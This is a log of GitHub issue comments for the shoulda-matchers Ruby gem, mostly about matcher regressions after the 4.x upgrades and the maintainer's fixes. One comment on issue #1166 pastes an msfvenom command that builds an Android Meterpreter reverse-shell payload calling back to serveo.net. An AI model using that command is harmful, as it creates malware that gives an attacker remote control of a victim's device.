[2019-03-22 11:39] zeeshangulzar commented on #1175
I tried this solution and getting following error
`NameError: uninitialized constant ActiveModel::ValidationMatcher`
**Rails Version:** Rails 5.2.2.1
**Ruby Version:** 2.5.1
**shoulda-matchers:** 3.1.3

[2019-03-22 13:53] PhilCoggins commented on #1175
@zeeshangulzar where did you add the code?

[2019-03-22 16:16] zeeshangulzar commented on #1175
I added code in a new file under  `config/initializers/`.

[2019-03-22 17:18] PhilCoggins commented on #1175
@zeeshangulzar I have mine in `rails_helper.rb`, underneath all my require statements. Also, I've only tested this patch with latest shoulda version 4.x, so without more info I'm not sure how much more help I can be.

[2019-03-23 10:02] easybills-admin opened #1195 "undefined method `does_not_match?' for (...) OnlyIntegerMatcher"
Hi there! 👋

I've found an issue when upgrading from version 3.x to 4.0.1.

The following spec used to pass:

[code]

Now it fails with the following error:

[code]

---

I declare this validation dynamically, depending on some conditions, that's why I sent the above example with an empty model.

Thank you!

---

My current stack:

* Ruby 2.6.2
* Rails 5.2.2.1
* rspec-rails 3.8.2
* shoulda-matcher

[2019-03-23 20:27] mcmire commented on #1195
Hey @easybills-admin. Thanks for reporting this. It's very possible we are missing tests for the negative case here, otherwise we would have caught this! We'll make sure to include a fix for this in the next release.

[2019-03-24 19:54] connorshea opened #1196 "Document how to match a multi-column index with have_db_index"
e.g. I have a migration like this:

[code]

And I have a matcher like this:

[code]

Currently, the documentation doesn't mention the ability to pass an array to the `have_db_index` matcher. It'd be nice if it did :)

https://github.com/thoughtbot/shoulda-matchers/blob/3635df70546f58152f1dc278f4385007f9903914/lib/shoulda/matchers/active_record/have_db_index_matcher.rb#L4-L26

[2019-03-26 10:56] zeeshangulzar commented on #1175
@PhilCoggins Thanks for guidance. I have also moved it into rails_helper and it worked.

[2019-03-26 14:57] rodrigovirgilio commented on #1196
I created the PR, would that be it? https://github.com/thoughtbot/shoulda-matchers/pull/1197

[2019-03-27 09:28] barmic12 commented on #1184
I had the same issue when I changed ruby version in my project. I sorted it out by removing Gemfile.lock and run again `bundle install`.

[2019-03-27 11:29] kaiomagalhaes commented on #951
I'm using rails 6-beta and it is still happening

[2019-03-27 15:15] mcmire commented on #951
@kaiomagalhaes What does your rails_helper.rb look like? Do you have `Shoulda::Matchers.configure` in this file or in a support file? Which version of shoulda-matchers are you using?

[2019-03-31 21:58] maknz opened #1198 "Presence validations which have an if condition on related models seem broken"
After upgrading from 3.1.3 to 4.0.1, I've found that two of our tests that use shoulda-matchers have started to fail. Both of these tests are asserting that a model validates presence of an attribute, as well as including an `if` condition for whether to run the validation, that accesses related models.

Suppose we have two models, `User` and `Group`, whereby a user belongs to a group and a group

[2019-04-02 14:17] yusuke-eto opened #1199 "validate_numericality_of validation seem broken when upgrade Rails 5.2.3"
After upgrade Rails 5.2.3, I've found that `validate_numericality_of ` validation fail.
Probably because of this change
https://github.com/rails/rails/pull/32852

Ruby version: 2.3.8
Rails version: 5.2.3
shoulda-matchers gem version: 4.0.1
factory_bot gem version: 4.11.1
factory_bot_rails gem version: 4.11.1

[2019-04-02 18:03] mcmire commented on #1199
Hi, is this still an issue? Curious why you closed this.

[2019-04-03 01:01] yusuke-eto commented on #1199
@mcmire
Sorry, I mistook close this.
Yes, this issue still happen.

[2019-04-03 01:44] mcmire commented on #1199
No worries. Can you give me a scenario that produces this bug?

[2019-04-03 02:22] yusuke-eto commented on #1199
After upgrading rails to 5.2.3, If i run following test, this bug happen.
I define balance decimal(16, 2).
[code]

[2019-04-08 16:03] clubbavi commented on #951
What about if I am using custom validator ?

[code]
And the tests for it:
[code]
It always gives error:
[code]
Any suggestions ?

[2019-04-08 17:58] mcmire commented on #951
@clubbavi The gem relies on your example groups to be tagged. RSpec will do this automatically for specs that you've placed in `spec/models`, `spec/controllers` or `spec/routing`. If your test for AccountValidator is not located here then you will need to tag it accordingly:

[code]

This point is explained in the [README](https://github.com/thoughtbot/shoulda-matchers#availability-of-matchers-in-

[2019-04-09 03:17] clubbavi commented on #951
@mcmire , yes, it's not located inside those folders. It has a folder structure of app/validators.

I have tried with the above solution, but error is it cannot find the model.

As well as:
[code]
Still I couldn't go through.

[2019-04-09 05:28] mcmire commented on #951
Alright. What version of shoulda-matchers are you using? Do you have a `Shoulda::Matchers.configure` block in your rails_helper/spec_helper? What happens if you place the includes in your example group directly?

[code]

[2019-04-10 15:31] clubbavi commented on #951
@mcmire ... we are using 4.0.0.rc1.

By adding the above code I am getting an error:
[code]

[code]

[2019-04-10 17:32] mcmire commented on #951
@clubbavi You can switch to 4.0.0 now, it's been released :) But okay. What does your validator class look like?

[2019-04-11 15:27] clubbavi commented on #951
@mcmire , I just tested with the recent version. Still the same issue.
For
[code]
I have added in the configuration:
[code]
& in the _sepc file:
[code]

[2019-04-12 18:01] mcmire commented on #951
@clubbavi So it looks like your Validator class does not have `attr_writer`s for the attributes. That is why it's telling you that the attribute doesn't exist. This is what I was saying before — this is not how the model matchers are designed to be used. If your class looked like this:

[code]

then `validate_presence_of` and friends would work. (At that point though, I would argue you don't have

[2019-04-16 16:28] Nittarab opened #1201 "validate_inclusion_of seem broken"
I'm testing my model in Rails 5.2.3

[code]

In the model i have this enum:
[code]

And this is the interesting part of the factory:
[code]

The test fail, but if  I add a more static expectation:

[code]
The expectation pass the test...
I'm i wrong or there is a Bug?

[2019-04-16 17:20] mcmire commented on #1201
Your factory sets `payment_type` to the first payment type, which is "bank_transfer", and you have a test that expects the `payment_type` of the `subject` to be "bank_transfer". Is there something else I should be looking at?

[2019-04-16 17:42] Nittarab commented on #1201
Oh sorry I forgot the error in the issue (updated). The error  is very strange:
 ` validates :payment_type, inclusion: { in: :payment_type }, if: -> { payed } `

Btw, my factory is not perfect because I should test the inclusion.
In my model I have this line:
`  validates :payment_type, inclusion: { in: :payment_type }, if: -> { payed }`

[2019-04-16 18:01] mcmire commented on #1201
@Nittarab Ah, so if you have a `enum` attribute, you don't need to add a validation, nor do you need to use the `validate_inclusion_of` matcher. The reason is that the `enum` macro changes the attribute so that it will raise an error if you give it something that isn't one of the allowed enum values:

[code]

Therefore, if you have an inclusion validation, that validation will never fail.

My reco

[2019-04-17 15:16] mcmire commented on #1201
No problem, glad I could help!

[2019-04-17 18:33] sandradc opened #1202 "config 'with.library :action_controller' not working with non rails app"
Hello!
I am working on a _Ruby on Jets_ app and using the **shoulda_matchers** gem, no problem to test my models and active_records but a problem occurs when I try to test my controllers.

Here is my config:

[code]

and here is the test I try to run:
[code]

So if I add this line `with.library :action_controller` in my config, I have the following error when I run `bundle exec rspec` ->
[code]

I

[2019-04-17 19:03] mcmire commented on #1202
@sandradc I'm not certain where that is coming from. Can you post the backtrace?

[2019-04-17 19:23] sandradc commented on #1202
@mcmire sure, here it is
[code]

[2019-04-17 21:15] mcmire commented on #1202
After looking at the Ruby on Jets library, specifically the `spec_helpers.rb` file referred to in the backtrace, it looks like it doesn't support the same syntax that Rails supports when it comes to executing actions in controller tests. In fact it seems like its controller tests are more like request specs. So instead of saying this:

[code]

you say:

[code]

[2019-04-18 05:27] sandradc commented on #1202
@mcmire thanks for the advise! I have followed what you said and here is my test updated:
[code]

I know use factory_bot with the following factory file:
[code]

But now it raises another error when I run `bundle exec rspec`:
[code]

with the following backtrace:
[code]

Backtrace is mostly related to this file: https://github.com/tongueroo/jets/blob/master/lib/jets/spec_helpers.rb

I don't quite

[2019-04-18 15:28] mcmire commented on #1202
I'm not sure. What is `params` in this case? What is `params.require(:user)`?

[2019-04-19 17:14] cickes commented on #574
Still present in 2019.  Will see if I can help.

[2019-04-22 16:35] dotanlang commented on #986
Hi,
I seem to have this problem under Rails 5.0.1
I'm during a process of upgrading Ruby to 2.5.3
And I just upgraded should-matchers to 4.0.1
Also using postgres

[2019-04-23 02:01] #1167 closed

[2019-04-23 02:01] #1186 closed

[2019-04-23 02:08] mcmire commented on #1167
This is fixed now! ^

[2019-04-23 19:35] philihp commented on #809
Fixed this by just changing my routes.

[code]
to
[code]

[2019-04-24 12:03] yourivdlans opened #1203 "Have to manually include matchers"
Hi!

Following this guide (https://github.com/thoughtbot/shoulda-matchers/wiki/Usage-with-standard-MiniTest-tests) I want to use Rails 6 and MiniTest.

I got it working but I still have to manually include the matchers I want to use for a test case.

I've created a gist with steps to reproduce this issue: https://gist.github.com/yourivdlans/2c6ec0bdfcf0c41d20a9e5dafaed7e04

Also I tried to use `ge

[2019-04-24 13:28] mcmire commented on #1203
@yourivdlans Keep in mind that the wiki is community-maintained, so it may not be as accurate as the official docs.

Since you're making use of `shoulda-matchers` directly and not going through `shoulda`, you need to add a configuration block to your test_helper. See: https://github.com/thoughtbot/shoulda-matchers#rails-apps

[2019-04-24 13:31] yourivdlans commented on #1203
I see, thanks! This works :)

[2019-04-24 13:31] #1203 closed

[2019-04-24 14:30] mcmire commented on #1203
No problem! Glad I could help.

[2019-04-24 23:32] connorshea commented on #1196
This is resolved now, thanks! :)

[2019-04-24 23:32] #1196 closed

[2019-04-24 23:37] connorshea commented on #1167
@mcmire can we get a new release now that Rails 6.0.0.rc1 is out? :) I just ran my test suite with the latest master on Rails 6 and it worked great 👍

[2019-04-25 21:30] ngouy commented on #1066
@mcmire demo app : https://github.com/ngouy/shoulda-matchers-test-apps (go for the rails-5-2rspec). I updated shoulda matchers to 4.x (it was 3.x)

[2019-04-25 21:53] mcmire commented on #1066
@ngouy I just tried out the test app you made and ran the tests for `user_spec.rb`. Aside from the `:yolo` association, the other two tests seemed to pass. So I'm not sure what issue you're running into here. Could you elaborate?

[2019-04-26 01:10] mcmire commented on #1066
@dgilperez Sorry, I didn't see this before until now! When you use `belongs_to :association, required: true` (or simply `belongs_to :association`), this will add a presence validation on your association to validate that it is set. Similarly, because this is the default behavior in Rails, by default the matcher will confirm that this presence validation is in place by asserting that when the assoc

[2019-04-26 07:13] dgilperez commented on #1066
@mcmire thanks for the explanation. `.without_validating_presence` looks exactly what we need :)

[2019-04-29 15:53] ngouy commented on #1066
@mcmire
![image](https://user-images.githubusercontent.com/12391171/56909036-74837180-6a75-11e9-9507-62cd4c91b5ff.png)

[2019-04-30 16:17] mcmire commented on #1066
@ngouy Ah ok. I gotcha. Well, in your case, I don't think it would be appropriate to use `without_validating_presence`. Unlike @dgilperez's case, you're not changing `prof` in any way. So the question to ask yourself here is, when validations get run, is there a chance that `prof` could be nil? If so, does this cause the record to fail validation? This is exactly the question that `belong_to` is s

[2019-05-02 14:22] #925 closed

[2019-05-08 06:02] shaheem007 commented on #1166
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R
/data/data/com.termux/files/usr/lib/ruby/gems/2.6.0/gems/activesupport-4.2.11.1/lib/active_support/core_ext/object/duplicable.rb:111: warning: BigDecimal.new is deprecated; use BigDecimal() method instead.

how to fix

[2019-05-08 20:37] mcmire commented on #1166
@shaheem007 This isn't the right project to report that warning. Please locate the issue tracker for the tool you're using and report it there instead.

[2019-05-09 10:29] nruth commented on #586
I'd like to suggest documenting this as unsupported in the matcher documentation. It should just set out that you need to be delegating to another method on the subject. Then the user can decide whether to hide their class behind an additional method, or not use the matcher.

It'd be nice if it worked, but it looks like that could be difficult because the macro is written assuming delegation to an

[2019-05-13 16:53] s4kharitonov opened #1206 "The association should have been defined with `optional: true`, but was not"
Hello, I get the error specified in the title, looked at similar problems and unfortunately didn't find a solution. Could you help me maybe I missed something?

**rails 5.2.1**
**shoulda-matchers 4.0.0.rc1**

Model:
[code]

Spec:
[code]

**Error**

**If set to**
it { should belong_to(:list_option).without_validating_presence

[2019-05-13 17:51] mcmire commented on #1206
Looks like you're on an old version. Try upgrading to 4.0.1 and seeing if that helps.

[2019-05-13 19:12] s4kharitonov commented on #1206
It worked, thanks for the quick reply

[2019-05-13 19:12] #1206 closed

[2019-05-13 20:25] mcmire commented on #1206
No problem!

[2019-05-15 16:23] rmcsharry commented on #753
I agree with @mcmire that what the OP was trying does not make sense since it does not test the behavior of the model.

I arrived here because I was looking for something similar at the attribute level, since that is where behaviour resides for custom validators.

To see what I mean I have put a detailed question on SO [here](https://stackoverflow.com/questions/56153001/rails-5-2-rspec-how-to-test

[2019-05-15 19:44] antifun commented on #919
I just ran into this too. The matcher should be aware of, and convey, the fact that an error for another validation besides the field it's told about happened.

I might try my hand at patching this, if no one else has (and since it's been about 3 years since it's been reported, that seems likely).

[2019-05-15 23:28] mcmire commented on #919
@antifun Coming back to this, I see what's going on. Part of the issue is that "valid" to the matcher means "has no validation errors associated with this particular attribute". As far as the logic goes I think this is fine, but I definitely agree that we need a change in messaging here. The logic to generate the error message for `allow_value` is fairly complex but you should be able to get at th

[2019-05-16 14:11] stephendolan opened #1207 "Custom case insensitive index fails to validate"
Using Shoulda Matchers 4.0.1 with Rails 6.0.0.rc1.

Rails allows you to create case-insensitive unique indices like this:
`add_index :api_tokens, "lower(token)", unique: true`

In PostgreSQL, this would generate:
`"index_api_tokens_on_lower_token" UNIQUE, btree (lower(token::text))`

In my model spec, I've tried validating:
`it { should have_db_index(:token).unique }`
`it { should have_db_index("l

[2019-05-16 14:42] mcmire commented on #1207
There is not, but this has been reported already: #945. I don't have any bandwidth at the moment unfortunately to implement this but I would gladly take a PR!

[2019-05-21 10:18] Loschcode opened #1208 "Enum string with_values broken"
In my `WebinarsIdentity` model

[code]

[code]

Well, I don't really know what to do with such output, everything seems correct.

[2019-05-21 15:51] mcmire commented on #1208
Hmm... that does seem fishy. I'll look into this when I have a chance.

[2019-05-21 18:16] stanhu opened #1209 "belong_to sets association to nil, causing a failure in validations"
In GitLab, we have the following definitions:

[code]

In the spec we have:

[code]

After upgrading from shoulda-matchers 3.1.2 to 4.0.1, this fails:

[code]

It seems the problem occurs because `AttributeSetter` in https://github.com/thoughtbot/shoulda-matchers/blob/bf7ea9a3af3ff09f1a3563ea127fa6ea16084a8a/lib/shoulda/matchers/active_model/allow_value_matcher/attribute_setter.rb#L83 is setting `

[2019-05-21 20:32] mcmire commented on #1209
Yes, this is intentional. Starting with Rails 5, `belongs_to` now adds a presence validation to the association, and so as of shoulda-matchers 4.0.0 the `belong_to` matcher follows suit and tests that this validation is there by setting the association to nil and asserting that there are validation errors. So it seems like the matcher has revealed a potential issue in your validation method. You m

[2019-05-21 21:05] stanhu commented on #1209
@mcmire Ok, thanks! I was thrown off because we already have these validations:

[code]

But I suppose we can't assume that these are called before this validation?

Thanks for your help!

[2019-05-21 21:05] #1209 closed

[2019-05-21 22:24] mcmire commented on #1209
Ah, okay. Yes, if you've placed these before the `validate` line, then they should be getting called beforehand. Although, if a validation fails, it's not going to prevent the other ones from running — ActiveRecord will run all of them.

That said, since you have custom validations, it might be more helpful in this case to tack `.without_validating_presence` onto the end of your `belong_to` matche

[2019-05-23 18:06] kyle-glick opened #1210 ""should have_and_belong_to_many" produces incorrect joined table when overriding ActiveRecord::Base#table_name_prefix"
# Context

I have two models that are joined by a `has_and_belongs_to_many` relationship

[code]

[code]

And an additional class that overrides `ActiveRecord::Base#table_name_prefix` in order to allow us to join associations between this application and another application that heavily relies on this one to generate some reports comparing data between the two applications.

[code]

Using the join

[2019-05-23 19:07] Jelkster commented on #814
+1

[2019-05-24 03:59] mcmire commented on #1198
Hey, so I took a closer look at the backtrace and it looks like the failure is coming from AssociationMatcher, i.e. `belong_to` or some such. What other tests do you have in your model spec?

[2019-05-27 23:01] formigarafa commented on #1095
I agree this is confusing but I don't think changing how `validate_presence_of` will improve this. It might create more confusion by mixing two different but similar concepts.

Probably, a note in the `validate_presence_of` error message nodding to the possibly expected code would help to learn and avoid 5 minutes searches to get to this thread.

[2019-05-28 10:45] souljuse commented on #682
I solved the problem by creating the factory instead of building it for the specific context.
  context do
    subject { create(: document_publishing_stage) }
    it do
      is_expected.to validate_uniqueness_of(:user_id).scoped_to(:organization_id)
    end
  end

[2019-05-28 17:45] yagudaev commented on #1095
@formigarafa you don't think those concepts are similar enough that it should pass when you have `validates_presence_of`?

`'student' must exist` is very similar to `'student' can't be blank` no? It is just slightly different messages.

[2019-05-28 22:32] formigarafa commented on #1095
If those were the same on rails, yes. but they are not.
one is defined by:
`belongs_to :student, required: true`
the other is defined by:
`validates :student, presence: true`

[2019-05-28 23:19] yagudaev commented on #1095
@formigarafa that makes sense. Yeah having a nicer message from `validate_presence_of` would be good. Thanks for the clarification

I guess the matcher would just check to see if there is a belongs to relationship and mentioned that `validate_presence` is different than `required: true` in rails, therefore you should either use a `belong_to` matcher or add a presence validation to the model.

[2019-05-29 18:58] mcmire commented on #1095
@formigarafa @yagudaev Thanks for the suggestions guys. That seems like a nice UX improvement. I'll add it to the queue for the next release.

[2019-05-30 06:40] mcmire commented on #1208
@Loschcode I think this might be a matter of updating the error message here to be more helpful. However, to fix this on your end, you might want to try something like:

[code]

[2019-05-31 14:04] #945 closed

[2019-05-31 14:04] #1207 closed

[2019-05-31 14:11] mcmire commented on #1175
Closing this since the fix for this is now in master. ^

[2019-05-31 14:11] #1175 closed

[2019-06-01 06:08] #1195 closed

[2019-06-01 06:08] mcmire commented on #1195
This should be fixed now.

[2019-06-01 18:30] felipero commented on #1095
I believe there is another case to be dealt with.

Consider the model:
[code]
and the spec:
[code]
I get the following faillure:

```Expected FitnessCriterium to have a belongs_to association called project (and for the record not to fail validation if :project is unset; i.e., either the association should have been defined with `optional: true`, or there should not be a presence validation on :pr

[2019-06-01 21:06] mcmire commented on #1095
@felipero In your case, just because you've defined your `belongs_to` initially as `optional: true` doesn't mean the association is actually optional. The `optional` qualifier on the `belong_to` matcher basically ensures that you can set that association to nil and everything will be okay. Judging by the validations you've added, this is clearly not the case. `belongs_to` supports another qualifie

[2019-06-01 21:14] mcmire commented on #1202
Hey — I'm going to close this issue as it doesn't seem to be a shoulda-matchers issue, but let me know if you need any more help with this.

[2019-06-01 21:14] #1202 closed

[2019-06-01 22:31] felipero commented on #1095
@mcmire I see what you mean. The trick is maybe figure that just by using `without_validating_presence` it will ignore the optional. Not that intuitive. Thanks for the answer.

[2019-06-01 23:18] mcmire commented on #1095
@formigarafa @yagudaev I decided to add a little bit to the end of the failure message that the presence matcher generates. How does this sound?

[code]

[2019-06-02 06:52] formigarafa commented on #1095
That looks very good.
That is exactly the kind of message I would have read and solved the problem immediately or taken me to the right documentation spot of shoulda-matcher or rails.
Great work,
Thank you.

[2019-06-02 19:42] yagudaev commented on #1095
@mcmire great work 👍

[2019-06-08 02:08] #1095 closed

[2019-06-08 05:41] mcmire commented on #1029
Sorry for the late reply on this. I finally updated the README if you want to take a look. ^

[2019-06-09 05:44] #1029 closed

[2019-06-09 06:49] lollar commented on #1029
Looks great 🎉 appreciate it!

[2019-06-09 17:51] #1178 closed

[2019-06-09 17:53] mcmire commented on #1178
Fixed!

[2019-06-09 18:52] wout opened #1217 "Testing permit does not work in Rails 6"
On the following test:

[code]

I get the following error:

[code]

I noticed a similar problem in #1018 but I'm not sure it's related or even fixed since then.

[2019-06-09 19:16] mcmire commented on #1217
@wout Hey, can you provide a full backtrace?

[2019-06-09 19:19] mcmire commented on #1187
Closing this in favor of the PR.

[2019-06-09 19:22] mcmire commented on #683
Sorry for the super long delay on this. This is now available in 4.1.0.

[2019-06-09 19:22] #683 closed

[2019-06-09 19:24] mcmire commented on #611
Related issue: #646. #723 may solve both of these at once, I'll have to check.

[2019-06-09 19:34] mcmire commented on #764
I'm going to close this issue as this gem is not designed to work with classes where there aren't writer methods, it's designed to operate against an already instantiated instance of a class instead of the class as a whole. We'd have to change _all_ of the matchers to support that use case and I don't have time to do that. I would suggest writing your own matchers to do this. Sorry.

[2019-06-09 19:34] #764 closed

[2019-06-09 19:37] mcmire commented on #834
I plan on rewriting the messaging for the association matchers so I can tackle this as a part of that.

[2019-06-09 19:42] mcmire commented on #853
Revisiting this (super old, I know) issue. I think all this was was a difference in error messages: "UUID is already assigned to some other Device" vs. "UUID is already _allocated_ to some other Device". Closing.

[2019-06-09 19:42] #853 closed

[2019-06-09 19:43] mcmire commented on #916
Closing due to lack of response.

[2019-06-09 19:43] #916 closed

[2019-06-09 19:55] mcmire commented on #927
This is fixed: c47e6db7391963d27cb9b45c37d9aa94e53f0590

[2019-06-09 19:55] #927 closed

[2019-06-09 19:58] mcmire commented on #929
Revisiting old bugs and I'm not sure what to do about this, so I'm closing this. I'm happy to reopen this if others are still seeing it, though.

[2019-06-09 19:58] #929 closed

[2019-06-09 19:59] mcmire commented on #937
Updating the numericality matcher to support a symbol is documented in #688, so I'm closing this in favor of that.

[2019-06-09 19:59] #937 closed

[2019-06-10 02:32] Drenmi commented on #1178
Thanks @mcmire! 🥇

[2019-06-10 10:42] wout commented on #1217
@mcmire Of course, here you go:

[code]

[2019-06-10 15:45] mcmire commented on #1217
Interesting, okay. I'll look into this further.

[2019-06-11 07:27] ZeroPointEnergy commented on #1198
I think I hit the same or a similar problem here: https://github.com/sodabrew/puppet-dashboard/pull/388

There are two tests which are now failing but if I downgrade shoula-matcher to ~> 3 they pass again.

[2019-06-11 07:43] kamillle opened #1218 "Clear up confusion w/ presence around belongs_to associations. (#1214) breaks existing behaviors."
`v4.1.0` includes a change `Clear up confusion w/ presence around belongs_to associations.` (#1214  ) . This breaks existing behaviors.

My application code is below.

[code]

And test code is below.

[code]

When execute `it { is_expected.to validate_presence_of(:user) }`, then user attribute is inserted `nil` until v4.0.1, but in v.4.1.0 user attribute is inserted `""` (empty string) and `valida

[2019-06-11 15:15] ZeroPointEnergy commented on #1198
In my case I bisected the issue to commit 3af3d9f7abb768c063759941724ccae48c7b76d6 . It also seems like a `should belongs_to` now triggers valiadatiors which wasn't the case previously.

[2019-06-11 16:09] mcmire commented on #1198
@ZeroPointEnergy Yup, you got it — it will now check to make sure that the record fails (or doesn't fail) validation if the association is set to nil.

Thanks for a link to your repo, I'll take a closer look at it.

[2019-06-11 16:43] mcmire commented on #1218
The presence validation calls `.present?` on your attribute to determine whether it's "present". Presence is defined as either an empty string or nil: https://github.com/rails/rails/blob/master/activesupport/lib/active_support/core_ext/object/blank.rb#L6. Therefore, to truly test the presence validation, you need to see what happens if your attribute is an empty string. The matcher really should h

[2019-06-12 00:03] mcmire opened #1219 "`belong_to` does not support `optional(false)`"
For a while I thought that `required` was the main option on `belong_to`, but it's `optional`. Therefore we should support passing `false` to `optional`. Right now if you have

[code]

you have to test it with:

[code]

and that seems weird.

[2019-06-12 04:47] stefanahman opened #1220 "validate_presence_of throws ActiveRecord::SerializationTypeMismatch if attribute is serialized to an array"
This become a problem with https://github.com/thoughtbot/shoulda-matchers/releases/tag/v4.1.0

[code]

This throws:
[code]

[2019-06-12 04:47] stefanahman commented on #1220
Similar to https://github.com/thoughtbot/shoulda-matchers/issues/643

[2019-06-13 03:49] mcmire commented on #1218
@kamillle Looking back at this, I'm having trouble writing a failing test for this based on your example. Are your tests breaking currently, and if so, which ones?

[2019-06-14 03:12] #1220 closed

[2019-06-14 03:14] mcmire commented on #1220
@stefanahman Hey! I merged in a PR that should fix this issue. Do you mind switching to master temporarily and see if it fixes your test?

[2019-06-14 03:22] kamillle commented on #1218
@mcmire oops...
Sorry for providing wrong code.
Correct code is below, plz check it.

[code]

[2019-06-14 05:17] stefanahman commented on #1220
This works fantastically!

[2019-06-14 12:11] gmmcal opened #1223 "validate_presence_of(:active_storage_field) throws exception"
Gem version: `4.1.0`
Ruby version: `2.6.3`
Rails version: `6.0.0.rc1`
Rspec version: `3.8.1`

Given a model

[code]

and a test

[code]

the test fails with this exception

[code]

I've created an example repository https://github.com/gmmcal/shoulda-error and the error can be seen in https://travis-ci.com/gmmcal/shoulda-error/builds/115617758

This bug was introduced on `4.1.0`. On `4.0.1` I canno

[2019-06-14 16:30] mcmire commented on #1223
Currently we don't have any tests around ActiveStorage attributes, so that's probably why you're seeing this issue. Happy to take a PR to fix it though!

[2019-06-14 16:56] gmmcal commented on #1223
I'm just updating the matrix on travis to prove the point. I'll then try to debug and fix the issue. When I have it, happy to open PR :)

[2019-06-14 23:01] gmmcal commented on #1223
Got to the root cause of the issue.

ActiveStorage associations do not behave the same way as regular associations. It is a special scenario of it. `has_one_attached` actually creates [two associations](https://github.com/rails/rails/blob/master/activestorage/lib/active_storage/attached/model.rb#L49), prepending attribute name with constant strings.

Since the introduction of testing empty string

[2019-06-17 17:54] code-later commented on #1223
@gmmcal we have the same issue with `daterange` backed columns in PostgreSQL:

[code]

Maybe this helps to further pin that problem down. If I could help provide any additional information please let me know.

[2019-06-17 19:18] gmmcal commented on #1223
@code-later at first sight, this is an unrelated issue, but they seem to be pin-pointed to the same root cause.

I already have a fix `almost` ready for the issue I presented. If you can come up with a PR on https://github.com/gmmcal/shoulda-error that shows the error you are facing and/or a direction for a fix, I'd be happy to include in my PR.

My current solution is based on a new `if` conditio

[2019-06-18 06:34] code-later commented on #1223
@gmmcal I'll have a look into this and hopefully come up with some solution as well :)

[2019-06-18 07:50] gmmcal commented on #1223
@code-later if you need help, let me know. I've just pushed the PR to this issue. You can check at #1224.

[2019-06-19 12:26] vnbrs commented on #870
In v4.0.0+, the usage is:

[code]

without the bool argument.

[2019-06-19 20:05] dvriezen opened #1225 "validate_inclusion_of broken if other validations exist on the model"
When adding a validate_inclusion_of test the following error arises around other validations on the model that I am testing on. This was not the behaviour in 3.1.1. It should just be testing the inclusion validation and not be failing because other validations exist.

[code]

The specific test I added was `it { should validate_inclusion_of(:status).in_array(['pending', 'running', 'canceled', 'comp

[2019-06-19 20:18] mcmire commented on #1225
@dvriezen The validation messages on the other attributes are being shown for debugging reasons, but they are not actually making the test fail. The test is failing because it is expecting `worker_class` to be invalid by having "is not included in the list" as one of the error messages. This would lead me to believe that you're using `it { should validate_inclusion_of(:worker_class) }` somewhere.

[2019-06-19 20:29] dvriezen commented on #1225
@mcmire oh, your comment lead me down the path to figure out what happened. It appears that with_message is required now if you have a custom message.

This breaking change wasn't in the changelog so I overlooked it at first.

[2019-06-19 20:29] #1225 closed

[2019-06-25 15:24] klaustopher opened #1228 "validate_presence_of fails for Shrine UploadedFile since empty string was introduced"
This somehow relates to #1223 and #1218, but I think it is also different. Please feel free to close and merge with one of the open issues.

Currently our update to `4.1.0` is blocked because on of our test cases is failing with the new version.

The model is super simple:

[code]

I have played around a bit and the shrine uploader simply ignores assigning `""` to the image attribute:

[code]

Che

[2019-06-25 17:14] mcmire commented on #1228
Thanks for the report! I have a branch in the works that _should_ fix this issue, but I'll leave this open in the meantime.

[2019-06-26 06:36] vitalinfo commented on #1228
the same problem with serializable fields, like
`serialize :data, Array`

got an exception:
[code]

[2019-06-26 12:21] zw963 opened #1229 "shoulda-matcher could not found test class name when work with rails 5.2.3 minitest."
## files
### Gemfile

[code]
### test_helper.rb

[code]

### test file

[code]

## Error

[code]

Following is backtrace.

[code]

[2019-06-26 13:13] zw963 commented on #1229
I guess the reason cause this is because i add "rspec-rails" into Gemfile too, after i remove `rspec-rails`, i get following error:

[code]

[2019-06-26 13:59] dannyfallon commented on #1220
@mcmire I just bumped into this myself when upgrading from 3.x to 4.1 - are there any plans to cut a new release? 🤞

[2019-06-26 15:00] zw963 commented on #1229
after add `shoulda-context`, it worked now.

[code]

So, maybe we need change following README.md to correct this info.

![image](https://user-images.githubusercontent.com/549126/60190976-1fda5800-9866-11e9-905a-927e7cbbda56.png)

[2019-06-27 13:17] ddavisgraphics commented on #803
I've had the same issue, the only way I've been able to solve the issue is to use the full line,
`RAILS_ENV=test bundle exec rspec`

[2019-06-27 16:04] mcmire commented on #803
Since this is an old issue, if you're still seeing issues please make a new issue! That will help me sort out what the actual issue you're having is.

[2019-07-04 12:53] benedikt commented on #1228
I'm running into similar problems with attributes (or rather methods) that get validated but are not handling strings but objects. In theory I could make all setters handle empty strings, but it feels like the wrong path.

[2019-07-07 04:18] mcmire commented on #1228
@klaustopher @vitalinfo @benedikt Hey, I just pushed up a branch, `fix-presence-validation-for-activemodel`, that should fix this issue. Can you temporarily switch to it in your Gemfile and see if makes your tests pass?

[2019-07-07 04:18] mcmire commented on #1218
@kamillle Hey, I just pushed up a branch, `fix-presence-validation-for-activemodel`, that should fix this issue. Can you temporarily switch to it in your Gemfile and see if makes your tests pass?

[2019-07-07 15:14] kamillle commented on #1218
@mcmire Sure. I'll check that!! Thank you!😍

[2019-07-08 07:31] benedikt commented on #1228
@mcmire Yes, that works. Thanks a lot for your efforts, Elliot!

[2019-07-08 07:44] klaustopher commented on #1228
Tested revision 11f4483 and it works fine with Shrine.

[2019-07-08 09:55] kamillle commented on #1218
@mcmire The fix is completely working in my case!!! Appriciate your working.😆🙌🙌

[2019-07-08 22:46] PeterMozesMerl opened #1232 "4.1.0 breaks not_nil validaton example"
I have one of the few cases when not_nil works while not_blank doesn’t and it shouldn’t.

When I upgraded my gems, I thought it was some upstream that broke it but if I force shoulda-matchers 4.0.1 to stay and upgrade everything else, it doesn’t break.

I have a few tables in PostgreSQL that are integer[], not null,  default '{}'::integer[].

This field type accepts only an array of integer values

[2019-07-09 01:04] mcmire commented on #1232
Hey, thanks for the bug report. There are some similar issues with the presence matcher other people have reported, and I know why this is happening. I think the matcher simply needs to consider whether the field is an array column and choose not to attempt to set the attribute to `""` if that is the case.

By the way, I've never heard of a `not_nil` option on `validates`. Is this a custom validat

[2019-07-09 01:23] #1223 closed

[2019-07-09 03:40] #1218 closed

[2019-07-09 03:40] #1228 closed

[2019-07-09 03:44] mcmire commented on #1232
I just merged in #1231, which should fix this issue. Can you briefly switch `shoulda-matchers` to use the master branch in your Gemfile and see if that makes this test pass?

[2019-07-09 09:37] PeterMozesMerl commented on #1232
I’m surprised because I was almost sure Rails had this validator even though it felt strange a bit because I know that #nil? is first-class "no! no!". I was sure I had no gem for it, and that was correct.

I found a file app/validators/not_nil_validator.rb

[code]

I put it there in 2016 in the initial commit of the project. I didn’t even remember how to write a custom validator. It’s the only fil

